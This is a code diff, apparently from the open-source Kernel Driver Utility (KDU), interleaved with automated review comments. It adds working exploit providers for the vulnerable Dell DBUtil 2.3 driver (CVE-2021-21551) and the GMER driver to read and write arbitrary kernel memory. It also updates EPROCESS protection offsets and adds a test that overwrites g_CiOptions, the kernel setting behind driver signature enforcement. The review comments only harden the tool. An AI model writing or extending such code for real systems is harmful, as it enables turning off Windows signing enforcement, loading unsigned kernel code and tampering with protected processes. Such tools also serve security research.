+ value = FIELD_OFFSET(DBUTIL_READWRITE_REQUEST, Data) + NumberOfBytes;
+ size = ALIGN_UP_BY(value, PAGE_SIZE);
+
+ pRequest = (DBUTIL_READWRITE_REQUEST*)VirtualAlloc(NULL, size,
+ MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+ if (pRequest) {
+
+ if (VirtualLock(pRequest, size)) {
+
+ pRequest->Unused = 0xDEADBEEF;
+ pRequest->VirtualAddress = VirtualAddress;
+ pRequest->Offset = 0;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_DBUTIL23_WRITEVM,
+ pRequest,
+ (ULONG)size,
+ pRequest,
+ (ULONG)size);
+
+ if (!bResult)
+ dwError = GetLastError();
+
+ VirtualUnlock(pRequest, size);
+ }
+
+ VirtualFree(pRequest, 0, MEM_RELEASE);
+ }
+
+ SetLastError(dwError);
+ return bResult;
+}
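Review bot: When `VirtualAlloc` or `VirtualLock` fails in `DbUtilReadVirtualMemory`, `dwError` is still `ERROR_SUCCESS`, so the closing `SetLastError(dwError)` overwrites the real failure code and the caller gets FALSE with a last error of 0. Capture the code on both failure paths, e.g. `else { dwError = GetLastError(); }` on the `if (VirtualLock(pRequest, size))` block and again on `if (pRequest)`, so it is read before `VirtualFree` runs, as the `supCallDriver` branch already does. `DbUtilWriteVirtualMemory` in this file and `GmerWriteVirtualMemory` in idrv/gmer.cpp follow the same pattern and need the same two branches.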
diff --git a/Source/Hamakaze/idrv/dbutil23.h b/Source/Hamakaze/idrv/dbutil23.h
new file mode 100644
index 0000000..9161159
--- /dev/null
+++ b/Source/Hamakaze/idrv/dbutil23.h
@@ -0,0 +1,65 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2022
+*
+* TITLE: DBUTIL23.H
+*
+* VERSION: 1.12
+*
+* DATE: 25 Jan 2022
+*
+* Dell BIOS Utility 2.3 driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+//
+// Dell driver interface.
+//
+
+#define DBUTIL23_DEVICE_TYPE (DWORD)0x9B0C
+
+#define DBUTIL23_FUNCTION_READVM (DWORD)0x7B1
+#define DBUTIL23_FUNCTION_WRITEVM (DWORD)0x7B2
+
+#define IOCTL_DBUTIL23_READVM \
+ CTL_CODE(DBUTIL23_DEVICE_TYPE, DBUTIL23_FUNCTION_READVM, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9B0C1EC4
+
+#define IOCTL_DBUTIL23_WRITEVM \
+ CTL_CODE(DBUTIL23_DEVICE_TYPE, DBUTIL23_FUNCTION_WRITEVM, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9B0C1EC8
+
+//
+// Virtual memory read/write
+//
+typedef struct _DBUTIL_READWRITE_REQUEST {
+ ULONG_PTR Unused;
+ ULONG_PTR VirtualAddress;
+ ULONG_PTR Offset;
+ UCHAR Data[1];
+} DBUTIL_READWRITE_REQUEST, * PDBUTIL_READWRITE_REQUEST;
+
+//
+// Size of data to read/write calculated as:
+//
+// InputBufferSize - sizeof packet header 0x18 bytes length
+//
+
+_Success_(return != FALSE)
+BOOL WINAPI DbUtilReadVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+_Success_(return != FALSE)
+BOOL WINAPI DbUtilWriteVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
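Review bot: The `Buffer` parameter of `DbUtilReadVirtualMemory` is annotated `_In_reads_bytes_(NumberOfBytes)`, but the implementation in idrv/dbutil23.cpp fills it with `RtlCopyMemory(Buffer, pRequest->Data, NumberOfBytes)`, so it is an output buffer. Declare it `_Out_writes_bytes_(NumberOfBytes) PVOID Buffer` here and on the definition; with the current annotation static analysis expects the caller to pass initialised input and does not check that the destination is large enough. `GmerReadVirtualMemory` in idrv/gmer.h and idrv/gmer.cpp carries the same annotation on a buffer it hands to `supCallDriver` as the output buffer. The `WRZeroReadKernelVirtualMemory` prototype visible in idrv/winring0.h already uses `_Out_writes_bytes_`, so the change also makes the read routines consistent.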
diff --git a/Source/Hamakaze/idrv/gmer.cpp b/Source/Hamakaze/idrv/gmer.cpp
new file mode 100644
index 0000000..a8f02d0
--- /dev/null
+++ b/Source/Hamakaze/idrv/gmer.cpp
@@ -0,0 +1,134 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2022
+*
+* TITLE: GMER.CPP
+*
+* VERSION: 1.12
+*
+* DATE: 25 Jan 2022
+*
+* GMER driver routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+#include "idrv/gmer.h"
+
+/*
+* GmerRegisterDriver
+*
+* Purpose:
+*
+* Driver initialization routine.
+*
+*/
+BOOL WINAPI GmerRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param)
+{
+ UNREFERENCED_PARAMETER(Param);
+
+ BOOL bResult;
+ ULONG ulRegistration = 0;
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_GMER_REGISTER_CLIENT,
+ &ulRegistration,
+ sizeof(ULONG),
+ &ulRegistration,
+ sizeof(ULONG));
+
+ return bResult && (ulRegistration == 1);
+}
+
+/*
+* GmerReadVirtualMemory
+*
+* Purpose:
+*
+* Read virtual memory via Gmer.
+*
+*/
+_Success_(return != FALSE)
+BOOL WINAPI GmerReadVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ GMER_READ_REQUEST request;
+
+ request.VirtualAddress = VirtualAddress;
+
+ return supCallDriver(DeviceHandle,
+ IOCTL_GMER_READVM,
+ &request,
+ sizeof(GMER_READ_REQUEST),
+ Buffer,
+ NumberOfBytes);
+
+}
+
+/*
+* GmerWriteVirtualMemory
+*
+* Purpose:
+*
+* Write virtual memory via Gmer.
+*
+*/
+_Success_(return != FALSE)
+BOOL WINAPI GmerWriteVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult = FALSE;
+
+ SIZE_T size;
+ ULONG value;
+ DWORD dwError = ERROR_SUCCESS;
+
+ GMER_WRITE_REQUEST* pRequest;
+
+ value = FIELD_OFFSET(GMER_WRITE_REQUEST, Data) + NumberOfBytes;
+ size = ALIGN_UP_BY(value, PAGE_SIZE);
+
+ pRequest = (GMER_WRITE_REQUEST*)VirtualAlloc(NULL, size,
+ MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+ if (pRequest) {
+
+ if (VirtualLock(pRequest, size)) {
+
+ pRequest->Unused = 0;
+ pRequest->VirtualAddress = VirtualAddress;
+ pRequest->DataSize = NumberOfBytes;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_GMER_WRITEVM,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
+
+ if (!bResult)
+ dwError = GetLastError();
+
+ VirtualUnlock(pRequest, size);
+ }
+
+ VirtualFree(pRequest, 0, MEM_RELEASE);
+ }
+
+ SetLastError(dwError);
+ return bResult;
+}
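Review bot: In `GmerWriteVirtualMemory`, `value = FIELD_OFFSET(GMER_WRITE_REQUEST, Data) + NumberOfBytes;` is computed in `ULONG`, so a `NumberOfBytes` close to the 32-bit maximum wraps to a small value and `RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes)` then writes past the allocation. Reject such a length before allocating, e.g. `if (NumberOfBytes > MAXDWORD - PAGE_SIZE - (ULONG)FIELD_OFFSET(GMER_WRITE_REQUEST, Data)) { SetLastError(ERROR_INVALID_PARAMETER); return FALSE; }`, which also keeps the page-aligned `size` within range of the later `(ULONG)size` cast. The callers are not visible in this diff, so the wrap may be unreachable today. The two functions in idrv/dbutil23.cpp compute their request size the same way and would take the same guard.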
diff --git a/Source/Hamakaze/idrv/gmer.h b/Source/Hamakaze/idrv/gmer.h
new file mode 100644
index 0000000..9cf637c
--- /dev/null
+++ b/Source/Hamakaze/idrv/gmer.h
@@ -0,0 +1,70 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2022
+*
+* TITLE: GMER.H
+*
+* VERSION: 1.12
+*
+* DATE: 25 Jan 2022
+*
+* GMER driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+
+//
+// Gmer driver interface.
+//
+
+#define GMER_DEVICE_TYPE (DWORD)0x7201
+#define GMER_DEVICE_TYPE_2 (DWORD)0x9876
+
+#define GMER_FUNCTION_READVM 0xA
+#define GMER_FUNCTION_WRITEVM 0xD
+#define GMER_FUNCTION_REGISTER_CLIENT 0x1
+
+#define IOCTL_GMER_REGISTER_CLIENT \
+ CTL_CODE(GMER_DEVICE_TYPE_2, GMER_FUNCTION_REGISTER_CLIENT, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) //0x9876C004
+
+#define IOCTL_GMER_READVM \
+ CTL_CODE(GMER_DEVICE_TYPE, GMER_FUNCTION_READVM, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) //0x7201C028
+
+#define IOCTL_GMER_WRITEVM \
+ CTL_CODE(GMER_DEVICE_TYPE, GMER_FUNCTION_WRITEVM, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) //0x7201C034
+
+typedef struct _GMER_READ_REQUEST {
+ ULONG_PTR VirtualAddress;
+} GMER_READ_REQUEST, * PGMER_READ_REQUEST;
+
+typedef struct _GMER_WRITE_REQUEST {
+ ULONG_PTR Unused;
+ ULONG_PTR VirtualAddress;
+ ULONG DataSize;
+ UCHAR Data[1];
+} GMER_WRITE_REQUEST, * PGMER_WRITE_REQUEST;
+
+BOOL WINAPI GmerRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param);
+
+_Success_(return != FALSE)
+BOOL WINAPI GmerReadVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+_Success_(return != FALSE)
+BOOL WINAPI GmerWriteVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
diff --git a/Source/Hamakaze/idrv/winring0.cpp b/Source/Hamakaze/idrv/winring0.cpp
index 1dfea35..66135d7 100644
--- a/Source/Hamakaze/idrv/winring0.cpp
+++ b/Source/Hamakaze/idrv/winring0.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: WINRING0.CPP
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 19 Apr 2021
+* DATE: 25 Jan 2022
*
* WinRing0 based drivers routines.
*
@@ -221,14 +221,14 @@ BOOL WINAPI WRZeroReadKernelVirtualMemory(
}
/*
-* WRZeroKernelVirtualMemory
+* WRZeroWriteKernelVirtualMemory
*
* Purpose:
*
* Write virtual memory.
*
*/
-BOOL WINAPI WRZeroKernelVirtualMemory(
+BOOL WINAPI WRZeroWriteKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
diff --git a/Source/Hamakaze/idrv/winring0.h b/Source/Hamakaze/idrv/winring0.h
index 671f5e9..162a12d 100644
--- a/Source/Hamakaze/idrv/winring0.h
+++ b/Source/Hamakaze/idrv/winring0.h
@@ -80,7 +80,7 @@ BOOL WINAPI WRZeroReadKernelVirtualMemory(
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
-BOOL WINAPI WRZeroKernelVirtualMemory(
+BOOL WINAPI WRZeroWriteKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
diff --git a/Source/Hamakaze/kduplist.h b/Source/Hamakaze/kduplist.h
index 5d8b5c4..7c66b22 100644
--- a/Source/Hamakaze/kduplist.h
+++ b/Source/Hamakaze/kduplist.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: KDUPLIST.H
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 18 Apr 2021
+* DATE: 25 Jan 2022
*
* Providers global list.
*
@@ -232,7 +232,7 @@ static KDU_PROVIDER g_KDUProviders[] =
(provAllocateKernelVM)KDUProviderStub,
(provFreeKernelVM)KDUProviderStub,
(provReadKernelVM)WRZeroReadKernelVirtualMemory,
- (provWriteKernelVM)WRZeroKernelVirtualMemory,
+ (provWriteKernelVM)WRZeroWriteKernelVirtualMemory,
(provVirtualToPhysical)WRZeroVirtualToPhysical,
(provReadControlRegister)KDUProviderStub,
(provQueryPML4)WRZeroQueryPML4Value,
@@ -427,5 +427,59 @@ static KDU_PROVIDER g_KDUProviders[] =
(provQueryPML4)DI64QueryPML4Value,
(provReadPhysicalMemory)DI64ReadPhysicalMemory,
(provWritePhysicalMemory)DI64WritePhysicalMemory
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_GMERDRV,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NONE,
+ (LPWSTR)L"Gmer \"Antirootkit\"",
+ (LPWSTR)L"gmerdrv",
+ (LPWSTR)L"gmerdrv",
+ (LPWSTR)L"GMEREK Systemy Komputerowe Przemyslaw Gmerek",
+
+ (provRegisterDriver)GmerRegisterDriver,
+ (provUnregisterDriver)KDUProviderStub,
+ (provPreOpenDriver)KDUProviderStub,
+ (provPostOpenDriver)KDUProviderStub,
+
+ (provAllocateKernelVM)KDUProviderStub,
+ (provFreeKernelVM)KDUProviderStub,
+ (provReadKernelVM)GmerReadVirtualMemory,
+ (provWriteKernelVM)GmerWriteVirtualMemory,
+ (provVirtualToPhysical)KDUProviderStub,
+ (provReadControlRegister)KDUProviderStub,
+ (provQueryPML4)KDUProviderStub,
+ (provReadPhysicalMemory)KDUProviderStub,
+ (provWritePhysicalMemory)KDUProviderStub
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_DBUTIL23,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NO_UNLOAD_SUP,
+ (LPWSTR)L"CVE-2021-21551",
+ (LPWSTR)L"DBUtil23",
+ (LPWSTR)L"DBUtil_2_3",
+ (LPWSTR)L"Dell Inc.",
+
+ (provRegisterDriver)KDUProviderStub,
+ (provUnregisterDriver)KDUProviderStub,
+ (provPreOpenDriver)KDUProviderStub,
+ (provPostOpenDriver)KDUProviderStub,
+
+ (provAllocateKernelVM)KDUProviderStub,
+ (provFreeKernelVM)KDUProviderStub,
+ (provReadKernelVM)DbUtilReadVirtualMemory,
+ (provWriteKernelVM)DbUtilWriteVirtualMemory,
+ (provVirtualToPhysical)KDUProviderStub,
+ (provReadControlRegister)KDUProviderStub,
+ (provQueryPML4)KDUProviderStub,
+ (provReadPhysicalMemory)KDUProviderStub,
+ (provWritePhysicalMemory)KDUProviderStub
}
};
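Review bot: Nothing ties the position of the two new entries in `g_KDUProviders` to `KDU_PROVIDER_GMER` (15) and `KDU_PROVIDER_DBUTIL23` (16) from kduprov.h; if providers are selected by index, as the numeric ids suggest, an entry added in the wrong place silently selects a different driver. A compile-time check after the array would at least catch a missing or extra entry: `static_assert(RTL_NUMBER_OF(g_KDUProviders) == KDU_PROVIDER_DBUTIL23 + 1, "provider ids out of sync");`. The DBUtil entry also puts the CVE id in the description field where the Gmer entry carries a product name, so a one-line comment saying that is intentional would help. The array starts outside this hunk.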
diff --git a/Source/Hamakaze/kduprov.cpp b/Source/Hamakaze/kduprov.cpp
index 7ccceca..7967c6c 100644
--- a/Source/Hamakaze/kduprov.cpp
+++ b/Source/Hamakaze/kduprov.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: KDUPROV.CPP
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 18 Apr 2021
+* DATE: 25 Jan 2022
*
* Vulnerable drivers provider abstraction layer.
*
@@ -27,6 +27,8 @@
#include "idrv/phymem.h"
#include "idrv/lha.h"
#include "idrv/directio64.h"
+#include "idrv/gmer.h"
+#include "idrv/dbutil23.h"
#include "kduplist.h"
/*
@@ -99,6 +101,12 @@ VOID KDUProvList()
if (prov->IgnoreChecksum)
printf_s("\tIgnore invalid image checksum\r\n");
+ //
+ // Some BIOS flashing drivers does not support unload.
+ //
+ if (prov->NoUnloadSupported)
+ printf_s("\tDriver does not support unload procedure\r\n");
+
//
// List "based" flags.
//
@@ -835,10 +843,18 @@ VOID WINAPI KDUProviderRelease(
if (Context->DeviceHandle)
NtClose(Context->DeviceHandle);
- //
- // Unload driver.
- //
- KDUProvStopVulnerableDriver(Context);
+ if (Context->Provider->NoUnloadSupported) {
+ supPrintfEvent(kduEventInformation,
+ "[~] This driver does not support unload procedure, reboot PC to get rid of it\r\n");
+ }
+ else {
+
+ //
+ // Unload driver.
+ //
+ KDUProvStopVulnerableDriver(Context);
+
+ }
if (Context->DriverFileName)
supHeapFree(Context->DriverFileName);
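Review bot: When `NoUnloadSupported` is set this branch skips `KDUProvStopVulnerableDriver` entirely, so the vulnerable driver stays loaded and its device stays reachable until the next reboot, and whatever else that call cleans up (not visible here) is skipped as well. That lasting state is only reported as a `kduEventInformation` line; I would document it at the branch, e.g. `// Driver cannot be unloaded: it stays resident, and reachable by any local caller that can open the device, until reboot.`. `Context->Provider` is also dereferenced without a check, which is fine only if it can never be NULL at this point. KDUProviderRelease starts and ends outside this hunk.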
diff --git a/Source/Hamakaze/kduprov.h b/Source/Hamakaze/kduprov.h
index 930b0a2..278cf3a 100644
--- a/Source/Hamakaze/kduprov.h
+++ b/Source/Hamakaze/kduprov.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2021
+* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: KDUPROV.H
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 18 Apr 2021
+* DATE: 25 Jan 2022
*
* Provider support routines.
*
@@ -34,6 +34,8 @@
#define KDU_PROVIDER_LHA 12
#define KDU_PROVIDER_ASUSIO2 13
#define KDU_PROVIDER_DIRECTIO64 14
+#define KDU_PROVIDER_GMER 15
+#define KDU_PROVIDER_DBUTIL23 16
#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
@@ -183,6 +185,11 @@ typedef enum _KDU_ACTION_TYPE {
//
#define KDUPROV_FLAGS_NO_FORCED_SD 0x00000008
+//
+// Do not unload, driver does not support this.
+//
+#define KDUPROV_FLAGS_NO_UNLOAD_SUP 0x00000010
+
typedef enum _KDU_SOURCEBASE {
SourceBaseNone = 0,
SourceBaseWinIo,
@@ -204,7 +211,8 @@ typedef struct _KDU_PROVIDER {
ULONG SignatureWHQL : 1;
ULONG IgnoreChecksum : 1;
ULONG NoForcedSD : 1;
- ULONG Reserved : 28;
+ ULONG NoUnloadSupported : 1;
+ ULONG Reserved : 27;
};
};
LPWSTR Desciption;
diff --git a/Source/Hamakaze/main.cpp b/Source/Hamakaze/main.cpp
index 6e10f11..b7d4444 100644
--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: MAIN.CPP
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 14 May 2021
+* DATE: 25 Jan 2022
*
* Hamakaze main logic and entrypoint.
*
@@ -533,7 +533,7 @@ VOID KDUIntroBanner()
{
IMAGE_NT_HEADERS* ntHeaders = RtlImageNtHeader(NtCurrentPeb()->ImageBaseAddress);
- printf_s("[#] Kernel Driver Utility v1.1.1 started, (c)2020 - 2021 KDU Project\r\n"\
+ printf_s("[#] Kernel Driver Utility v1.1.2 started, (c)2020 - 2022 KDU Project\r\n"\
"[#] Build at %s, header checksum 0x%lX\r\n"\
"[#] Supported x64 OS : Windows 7 and above\r\n",
__TIMESTAMP__,
diff --git a/Source/Hamakaze/pagewalk.cpp b/Source/Hamakaze/pagewalk.cpp
index b3cd54e..e757afc 100644
--- a/Source/Hamakaze/pagewalk.cpp
+++ b/Source/Hamakaze/pagewalk.cpp
@@ -4,9 +4,9 @@
*
* TITLE: PAGEWALK.CPP
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 18 Apr 2021
+* DATE: 16 May 2021
*
* Function to translate virtual to physical addresses, x86-64.
*
@@ -20,7 +20,9 @@
#include "global.h"
#define PHY_ADDRESS_MASK 0x000ffffffffff000ull
+#define PHY_ADDRESS_MASK_1GB_PAGES 0x000fffffc0000000ull
#define PHY_ADDRESS_MASK_2MB_PAGES 0x000fffffffe00000ull
+#define VADDR_ADDRESS_MASK_1GB_PAGES 0x000000003fffffffull
#define VADDR_ADDRESS_MASK_2MB_PAGES 0x00000000001fffffull
#define VADDR_ADDRESS_MASK_4KB_PAGES 0x0000000000000fffull
#define ENTRY_PRESENT_BIT 1
@@ -76,11 +78,21 @@ BOOL PwVirtualToPhysical(
return 0;
}
- if ((r == 2) && ((entry & ENTRY_PAGE_SIZE_BIT) != 0)) {
- table &= PHY_ADDRESS_MASK_2MB_PAGES;
- table += VirtualAddress & VADDR_ADDRESS_MASK_2MB_PAGES;
- *PhysicalAddress = table;
- return 1;
+ if (entry & ENTRY_PAGE_SIZE_BIT)
+ {
+ if (r == 1) {
+ table &= PHY_ADDRESS_MASK_1GB_PAGES;
+ table += VirtualAddress & VADDR_ADDRESS_MASK_1GB_PAGES;
+ *PhysicalAddress = table;
+ return 1;
+ }
+
+ if (r == 2) {
+ table &= PHY_ADDRESS_MASK_2MB_PAGES;
+ table += VirtualAddress & VADDR_ADDRESS_MASK_2MB_PAGES;
+ *PhysicalAddress = table;
+ return 1;
+ }
}
}
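Review bot: The paging level is compared against bare literals in `if (r == 1)` and `if (r == 2)`, and the two branches differ only in the mask pair. Assuming `r` counts levels down from the PML4, named levels such as `#define PW_LEVEL_PDPT 1` and `#define PW_LEVEL_PD 2` next to the masks would make it clear that the 1 GB case is the PDPT entry and the 2 MB case the PD entry. A short comment should also say that the bit tested by `ENTRY_PAGE_SIZE_BIT` is deliberately ignored at the other levels, where it is reserved or has a different meaning (PAT in a 4 KB PTE). The loop around this code starts outside the hunk.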
diff --git a/Source/Hamakaze/ps.cpp b/Source/Hamakaze/ps.cpp
index 121c033..227073a 100644
--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2018 - 2021
+* (C) COPYRIGHT AUTHORS, 2018 - 2022
*
* TITLE: PS.CPP
*
-* VERSION: 1.10
+* VERSION: 1.12
*
-* DATE: 15 Apr 2021
+* DATE: 25 Jan 2022
*
* Processes DKOM related routines.
*
@@ -152,7 +152,9 @@ BOOL KDUControlProcess(
case NT_WIN10_20H1:
case NT_WIN10_20H2:
case NT_WIN10_21H1:
- case NTX_WIN10_ADB:
+ case NT_WIN10_21H2:
+ case NT_WIN11_21H2:
+ case NTX_WIN11_ADB:
Offset = PsProtectionOffset_19041;
break;
default:
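Review bot: The three new cases map builds 19044, 22000 and 22494 to `PsProtectionOffset_19041`, but the comment on that macro in ps.h only claims the offset for 19042..19044. A wrong EPROCESS offset here turns the later write into corruption of an unrelated field, so the Windows 11 value should be confirmed against symbols for those builds and recorded, e.g. `//same for 19042..19044, 22000`. `NTX_WIN11_ADB` names one preview build, so any other preview build falls through to `default:`; a comment saying so would help. The switch starts and ends outside this hunk.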
diff --git a/Source/Hamakaze/ps.h b/Source/Hamakaze/ps.h
index 1d7308a..c84f63d 100644
--- a/Source/Hamakaze/ps.h
+++ b/Source/Hamakaze/ps.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2018 - 2021
+* (C) COPYRIGHT AUTHORS, 2018 - 2022
*
* TITLE: PS.H
*
-* VERSION: 1.10
+* VERSION: 1.12
*
-* DATE: 02 Apr 2021
+* DATE: 25 Jan 2022
*
* Processes support prototypes and definitions.
*
@@ -26,7 +26,7 @@
#define PsProtectionOffset_15063 (ULONG_PTR)0x6CA //same for 16299, 17134, 17763
#define PsProtectionOffset_18362 (ULONG_PTR)0x6FA
#define PsProtectionOffset_18363 (ULONG_PTR)0x6FA
-#define PsProtectionOffset_19041 (ULONG_PTR)0x87A; //same for 19042..19043
+#define PsProtectionOffset_19041 (ULONG_PTR)0x87A //same for 19042..19044
#define EPROCESS_TO_PROTECTION(Object, PsProtectionOffset) ((ULONG_PTR)Object + (ULONG_PTR)PsProtectionOffset)
diff --git a/Source/Hamakaze/res/SB_SMBUS_SDK.bin b/Source/Hamakaze/res/SB_SMBUS_SDK.bin
index 7f7a90a..2849bf3 100644
Binary files a/Source/Hamakaze/res/SB_SMBUS_SDK.bin and b/Source/Hamakaze/res/SB_SMBUS_SDK.bin differ
diff --git a/Source/Hamakaze/resource.rc b/Source/Hamakaze/resource.rc
index 1bc854f..d336162 100644
--- a/Source/Hamakaze/resource.rc
+++ b/Source/Hamakaze/resource.rc
@@ -51,8 +51,8 @@ END
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,1,1,2105
- PRODUCTVERSION 1,1,1,2105
+ FILEVERSION 1,1,2,2201
+ PRODUCTVERSION 1,1,2,2201
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -69,12 +69,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility"
- VALUE "FileVersion", "1.1.1.2105"
+ VALUE "FileVersion", "1.1.2.2201"
VALUE "InternalName", "Hamakaze.exe"
- VALUE "LegalCopyright", "Copyright (C) 2020 - 2021 KDU Project"
+ VALUE "LegalCopyright", "Copyright (C) 2020 - 2022 KDU Project"
VALUE "OriginalFilename", "Hamakaze.exe"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.1.1.2105"
+ VALUE "ProductVersion", "1.1.2.2201"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Hamakaze/tests.cpp b/Source/Hamakaze/tests.cpp
index 11be5dd..dd1c09d 100644
--- a/Source/Hamakaze/tests.cpp
+++ b/Source/Hamakaze/tests.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: TESTS.CPP
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 14 May 2021
+* DATE: 25 Jan 2022
*
* KDU tests.
*
@@ -47,6 +47,21 @@ VOID KDUTestLoad()
}
}
+VOID KDUTestDSE(PKDU_CONTEXT Context)
+{
+ ULONG_PTR g_CiOptions = 0xfffff805fc446d18;
+ ULONG_PTR oldValue = 0, newValue = 0x1337, testValue = 0;
+
+ KDUReadKernelVM(Context, g_CiOptions, &oldValue, sizeof(oldValue));
+ Beep(0, 0);
+ KDUWriteKernelVM(Context, g_CiOptions, &newValue, sizeof(newValue));
+ Beep(0, 0);
+ KDUReadKernelVM(Context, g_CiOptions, &testValue, sizeof(testValue));
+ if (testValue != newValue)
+ Beep(1, 1);
+ KDUWriteKernelVM(Context, g_CiOptions, &oldValue, sizeof(oldValue));
+}
+
VOID KDUTest()
{
PKDU_CONTEXT Context;
